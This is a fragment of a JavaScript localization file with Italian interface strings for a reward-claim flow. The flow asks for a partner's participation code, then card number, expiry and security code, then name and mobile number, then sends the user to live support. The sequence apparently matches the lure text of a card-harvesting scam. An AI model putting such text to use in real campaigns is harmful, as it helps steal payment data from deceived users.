    card_title: "Dettagli di Pagamento",
    card_subtitle: "Controlla e conferma i tuoi dettagli.",
    card_owner_label: "Nome del Titolare",
    card_number_label: "Numero di Carta",
    card_expiry_label: "Data di Scadenza MM/AA",
    card_cvv_label: "Codice di Sicurezza",
    card_button: "Continua",
    code_title: "Benvenuto",
    code_subtitle: "Inserisci il codice di partecipazione che hai ricevuto da {partner} per sbloccare la tua ricompensa.",
    code_button: "Conferma Codice",
    live_support_title: "Supporto Live",
    live_support_subtitle: "Per continuare, devi contattare il nostro servizio clienti.\n\nClicca sul pulsante qui sotto per avviare la chat.",
    live_support_button: "Avvia Chat",
    profile_title_small: "Conferma Premio",
    profile_title_main: "L'importo del tuo Bonus",
    profile_subtitle: "Conferma i tuoi dati per l'ulteriore elaborazione.",
    profile_firstname_label: "Nome",
    profile_lastname_label: "Cognome",
    profile_phone_label: "Numero di Cellulare",
    profile_button: "Avanti",
    profile_loading_text: "Elaborazione..."
  }
};
